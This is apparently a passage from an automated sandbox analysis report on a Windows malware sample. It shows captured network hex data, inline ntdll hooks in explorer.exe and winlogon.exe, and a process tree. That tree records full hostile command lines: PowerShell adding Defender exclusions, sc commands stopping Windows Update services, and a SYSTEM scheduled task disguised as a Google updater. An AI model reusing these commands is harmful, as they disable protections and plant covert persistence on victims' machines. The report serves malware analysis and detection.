2024-10-09 14:15:57 UTC	1369	IN	Data Raw: 5a 71 33 2f ed fe 1a 19 33 2f ed 0e ba c1 33 2f ed ee cb e9 33 2f ed 6e 3a d1 33 2f ed 8e 8a aa 4e 8f ea be d6 2f 37 58 c7 d0 58 d2 2b a3 1f 17 11 10 d2 2b a3 1f cf 59 98 d2 2b a3 67 cf 59 30 d2 2b a3 af 77 a1 d7 ba 27 43 6f cf e9 c3 c4 7c 1b b2 6f 3d a7 88 12 c9 fa e9 3d 10 38 3f d6 16 b8 36 af a9 62 3b 86 1d 24 08 e2 ff 7b c4 c1 2e 78 1b 51 b6 14 fe 2c 30 fc e9 ca 50 d5 35 6e ed 18 2d e7 66 75 67 b8 c6 1e 20 bf d2 41 79 41 00 11 b9 28 d5 6b f2 36 de 2d f8 19 8f 40 73 48 14 a4 0b 20 2a 37 1e 38 a0 72 16 be f4 ca 33 e9 32 e2 1d c0 a8 c5 2d b7 eb db f5 fa c9 61 16 cf f6 29 eb f0 dc 1a f0 cf a7 e3 74 8d b7 eb 5b 66 43 75 35 96 d3 e1 cc 5d 62 2d 8e 44 d5 05 37 94 35 64 87 22 73 48 14 24 07 2e a4 2b 66 13 1f 7b 8d d2 68 51 8d b7 eb 5b 8a 2a f8 90 47 39 94 2e Data Ascii: Zq3/3/3/3/n:3/N/7XX++Y+gY0+w'Co\|o==8?6b;${.xQ,0P5n-fug AyA(k6-@sH 78r32-a)t[fCu5]b-D75d"sH$.+f{hQ[G9.
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: dd 4d c3 ba 6b 5f 38 e8 3c 11 2a 00 97 00 7b 96 03 1b 81 b4 b0 2a c2 57 23 81 b4 b0 aa 66 83 bb 03 dc 8e 86 66 48 2f fb 6e 4f 6d fb b8 87 64 b7 ac 59 7f c7 53 fe 70 47 88 bc 24 83 82 68 c6 4d 21 e6 6a 7b 52 23 4a 5e da 2e ae 1a 87 11 d9 b5 3c 89 d6 4d a9 34 53 27 e7 44 f9 ed a4 1f 69 19 29 78 f2 e8 a7 64 15 04 00 d0 aa 58 da d1 77 78 9d 2d fd 32 be 71 e5 87 11 d9 d6 d8 0f 61 a4 ee a7 77 43 c3 48 7a 3e 17 c0 d1 bb e5 87 11 bf 38 dd a2 51 4b 4b 6c c1 ac a7 8b 20 10 e5 87 11 d9 58 e7 50 ef 50 da 63 fe 0b 27 46 ee 18 78 ee 2e 2e 43 da 8b 10 ab 51 11 60 1c 96 5a 80 9f a3 f0 f9 dd 28 ce 23 b2 99 36 b4 58 cb 27 1a 89 04 ec 27 4f e3 58 5a 74 d5 ce c0 01 e7 00 91 f1 82 d5 30 3d f8 43 0f 3b ce 44 54 f3 20 a4 97 e3 44 a0 35 23 c7 57 ff ad 16 de 0d 88 05 57 50 af 14 Data Ascii: Mk_8<{W#ffH/nOmdYSpG$hM!j{R#J^.<M4S'Di)xdXwx-2qawCHz>8QKKl XPPc'Fx..CQ`Z(#6X''OXZt0=C;DT D5#WWP
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: 92 62 7c c3 95 6c 9f d1 c5 1c 38 28 dc ad e0 76 7d 1d 92 69 dd d0 c5 1c 38 f7 14 c3 a2 58 d6 87 3c 2a 4f 6b fd ab c3 ed 78 20 c8 16 cc 93 cf 2f 1c 47 d5 3e 6b 7b e0 d3 5f 40 23 99 9d 91 03 0c 95 d4 a9 07 15 1d 3a e6 3f ab cb 44 13 3e 19 05 0b a8 4b 16 08 61 b2 b4 0d 9f b9 be 17 aa 09 d3 ee 7b ac 88 ca 17 cc d1 c5 1c 38 47 f4 5b 76 fb 41 0e 6f 24 f8 ff 3b f7 ca be 23 2a 1a 9d c3 80 8f 77 15 d0 c5 1c d4 e5 63 be 17 41 84 5a 34 aa c3 ed 78 5f 73 27 05 4b c3 1e 05 db 20 65 a5 69 89 02 f4 96 d0 c4 df 0b 2f 3a e3 e7 dd 8f 54 40 6c e3 0b 45 e4 c4 5e 34 46 27 d3 c5 1c 38 16 f8 97 cc 15 da 35 ce 70 ab c8 d8 7a 07 2f ea 0c bf e9 84 6e ad 7a d1 93 66 d6 48 8f 38 4d 04 85 ba a4 b7 5b 9b 2f d1 d4 8a c2 b6 87 69 41 27 15 f3 27 3a e3 c7 d1 56 70 c5 cc 12 eb 49 72 1c 87 Data Ascii: b\|l8(v}i8X<Okx /G>k{_@#:?D>Ka{8G[vAo$;#wcAZ4x_s'K ei/:T@lE^4F'85pz/nzfH8M[/iA'':VpIr
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: 23 85 34 bb a2 6f 81 cf 15 34 8b 30 c9 cf 15 34 92 6e 49 cf 15 34 83 19 51 3e 18 a6 66 a9 1e 57 82 b6 f8 42 91 f0 19 71 db 4f cb 04 3c 71 da 42 00 2f 62 57 53 e1 79 07 23 78 ab b0 1a ea 4f 8b 78 ab b0 46 aa 53 33 f8 90 b8 0c 18 44 7e 2e ed 39 58 de 1e 7b 4e 2b 93 4f 7f 22 c2 e9 c9 37 f0 c6 79 23 22 9b d6 dc 73 c2 c3 69 49 2a d3 c2 c3 69 08 ba 13 c2 c3 69 28 e4 bb c2 c3 69 a0 1d 53 b9 28 fd 8e 8a 4c f6 6f 60 c1 a5 4d 50 d4 42 d0 d6 10 44 cc d7 29 90 3b a9 fb 7a 96 09 0d 7a b5 b0 18 58 e5 6d f8 dd 8e 6c 14 66 49 9e b6 ac a7 85 01 75 84 4a 4f b0 d8 6d d5 05 0d 96 7c 40 c1 ad e6 6b a0 9e 49 6b 4f 83 47 c1 47 a7 c2 48 bb a8 46 92 0e 7d 13 56 fe 28 80 f1 2c a1 d8 1d 46 5b ef f9 25 f2 25 2e 77 f0 0e ca 95 2e 77 f0 9f a4 fd 2e 77 f0 16 1c 15 a6 e2 b7 ae a6 26 d4 Data Ascii: #4o404nI4Q>fWBqO<qB/bWSy#xOxFS3D~.9X{N+O"7y#"siI*ii(iS(Lo`MPBD);zzXmlfIuJOm\|@kIkOGGHF}V(,F[%%.w.w.w&
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: ac 1e 0c 16 e5 64 cf 45 93 05 2c 01 86 61 a8 4b 2c e4 18 73 5a 73 3e f1 77 b4 11 35 b2 ee f4 0f 52 60 d1 0a 52 ef 37 74 ba ad f4 01 ec 75 7d ef 63 3b 09 52 0a fa 03 31 e0 1a 00 02 5a 98 f8 1a 00 02 f3 49 10 1a 00 02 da c0 28 1a 00 02 83 47 48 1a 00 02 03 f6 38 01 91 46 f5 3b a8 45 12 88 a2 d8 1a 7f e0 32 83 a1 ab 19 76 80 1d 26 3d 5c 94 4d 58 bd 76 e4 62 3d 2e 25 1e 67 9e 8f fc c2 be f3 3f 0a e9 7a b2 2e 07 64 9e 8f 74 d0 99 28 4d b4 3b 01 d7 bf 61 70 0b 53 4c 09 91 8a 43 c6 d1 8e dd 9e e1 96 ee b9 91 62 8d 38 59 9c 51 94 a5 63 64 aa 6c 6a 14 66 29 ec 5f 22 e6 e0 c3 e0 22 1f bb a1 44 c5 a1 f7 d2 5e b7 9a 61 70 bb f1 13 25 ee 30 ad d1 2f 60 39 64 9e 8f 20 50 14 51 74 d0 a2 4e 46 6c 8f 79 85 ae 10 1b 70 fc 52 d8 65 f9 29 b9 ac c9 47 9a 18 66 9c 02 cf fd 19 Data Ascii: dE,aK,sZs>w5R`R7tu}c;R1ZI(GH8F;E2v&=\MXvb=.%g?z.dt(M;apSLCb8YQcdljf)_""D^ap%0/`9d PQtNFlypRe)Gf
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: f6 8e ff 32 72 2a 8a 93 77 c6 8d 11 b8 c8 4a b9 9d 20 72 bc 20 2c e6 45 eb 73 24 48 eb 66 50 f3 4e 97 20 1f b8 0e d6 36 7e 0f 78 5e d5 3e eb 2b 7e c3 75 f8 5b b0 68 df 37 58 fb b0 68 df e7 68 3b b0 68 df 07 38 ad cc 98 46 2e 0b 24 49 0d 27 07 fc c4 68 83 3f 72 66 cb 27 f5 7d 9c 02 2e 64 71 8a 31 b1 49 bf 3c 96 1e 32 03 5a ac ac 26 6e 32 03 5a 24 cc 9e b6 8f 58 5a 9a 8a 93 07 ac a5 11 c8 28 0a 92 cc fc a5 c0 68 8a 52 66 e8 a5 a0 9c 48 81 44 24 08 9c a7 d4 be 48 c7 44 24 10 27 cd 36 55 ff 74 24 00 9d 48 8d 64 24 10 e8 1d 83 28 01 d0 5b 82 b6 36 4e 5f fc 19 71 f5 49 b5 8a 54 4f 78 58 d1 dd 8a 54 4f 50 58 bd 8d 8a 54 4f 48 58 f9 c5 8a 54 4f f0 14 85 2d 0d bc 68 03 a3 ff a1 a8 b1 a2 81 6a 01 0b e0 6d d0 2c a5 e5 05 62 f6 e8 7b a8 d6 19 ad c7 88 b3 23 ad a8 2a Data Ascii: 2rwJ r ,Es$HfPN 6~x^>+~u[h7Xhh;h8F.$I'h?rf'}.dq1I<2Z&n2Z$XZ(hRfHD$HD$'6Ut$Hd$([6N_qITOxXTOPXTOHXTO-hjm,b{#
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: 0b c6 f6 37 a7 ab 08 86 5c b5 e8 f6 ee ce 60 1d 50 09 b4 5c 27 00 c8 4f 60 fc d5 12 39 b3 22 f7 bd f6 d7 64 69 d6 ce 50 78 29 b4 31 c7 99 60 94 7f 77 79 fe 37 a6 94 b6 33 e2 28 58 cf 0c 24 3c 9b ca cb 67 98 16 4f 33 95 64 76 3c c2 37 36 d9 9d 3e 7d 52 f5 4a 61 49 eb 71 af 5e ad 44 9b 68 13 00 99 07 40 a8 f2 61 2e 5f ad 9d fc 7c de 46 d3 f8 42 ce 38 66 db 7f dd 43 c9 92 0e 3a ea b4 2d 84 30 8c 18 53 b4 31 c7 f9 7a c7 c2 ab e3 5b 86 43 0a e9 23 90 8d 13 34 66 38 4e bd f5 16 6c 9b f1 99 bf fc f7 5f 52 10 8f 0d fd 3a 90 91 26 46 bc 1f 66 02 d1 8d 3c 3a 66 5e 33 bb af 06 79 0f e3 4a ce 38 66 58 4b 2d 3f 34 b8 ac f5 42 a0 58 d3 17 38 6e 5c dc 0c d5 35 4d d8 50 08 6a 5c c2 37 36 d9 d2 1c 67 32 c6 ac 5e 32 d1 12 37 92 87 f2 76 a8 34 1b df 7d 7c 14 88 e9 e1 f4 26 Data Ascii: 7\`P\'O`9"diPx)1`wy73(X$<gO3dv<76>}RJaIq^Dh@a._\|FB8fC:-0S1z[C#4f8Nl_R:&Ff<:f^3yJ8fXK-?4BX8n\5MPj\76g2^27v4}\|&
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: 1e 6d dd 0e 4f 8c 5e 78 10 61 5d ce 95 cf cb 2a 70 84 99 2a aa 48 9a 9e 9e f9 b7 05 eb f9 78 e8 88 15 1d b8 db 5b fc 85 ab 10 4a 8f 4b ce c7 32 c7 91 2b 17 a2 f7 0d d2 dc cd 89 31 91 cc b4 31 f6 87 39 5d 67 cd 2f c4 77 58 df 6d 3e 41 2f c7 bb 68 90 3b 30 24 95 ff 7f 4d 7e a5 be c4 5b 26 43 f9 6b 98 c5 90 78 12 52 7e 9f e2 ad 3c 95 58 8a bb b8 21 98 7b 72 56 e7 e3 c6 68 b7 1c fb db 9b b8 d1 dd 6c a7 9f f7 d9 38 ba b8 21 98 d4 20 d7 55 c0 90 ee 55 d7 2e 87 f5 80 e2 7d 0c d9 4c 01 8b 40 60 c4 ed e4 16 3f a5 64 72 d9 b5 6e 58 6a 22 3d a2 51 d4 e6 c0 be d0 d8 f0 0e 02 0f 3a 82 6e 75 db 10 40 5a 46 0d d1 ca 88 e8 ba 3f 41 2f bc 3e 7f 45 f4 7f c4 2e 4e 11 88 b6 25 3f 78 00 3c b2 10 ff 51 72 c2 fd 84 22 7a b9 3d 9a 22 c3 e1 db 55 ec 52 4b ec 9b 28 5d 4f 06 47 09 Data Ascii: mO^xa]pHx[JK2+119]g/wXm>A/h;0$M~[&CkxR~<X!{rVhl8! UU.}L@`?drnXj"=Q:nu@ZF?A/>E.N%?x<Qr"z="URK(]OG

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	10:15:55
Start date:	09/10/2024
Path:	C:\Users\user\Desktop\zufmUwylvo.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\zufmUwylvo.exe"
Imagebase:	0x1b66b520000
File size:	266'752 bytes
MD5 hash:	C526CB2C72A976831C06FC09991E20D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:16:18
Start date:	09/10/2024
Path:	C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Imagebase:	0x140000000
File size:	20'970'496 bytes
MD5 hash:	413E4E7BC129E8165D1FFD2B1AE5DB04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:16:24
Start date:	09/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:16:25
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:16:25
Start date:	09/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 8104 -s 2528
Imagebase:	0x7ff758770000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff7132e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff7a7120000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff7a7120000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff7a7120000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff7a7120000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff7a7120000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff7132e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff782a40000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff78f430000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff78f430000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:16:31
Start date:	09/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff779b10000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	10:16:32
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff78f430000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:16:32
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff78f430000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:16:32
Start date:	09/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6afc30000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	10:16:33
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	10:16:33
Start date:	09/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff7d1820000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	10:16:37
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:16:37
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	10:16:38
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	10:16:38
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeusererSvc
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	10:16:38
Start date:	09/10/2024
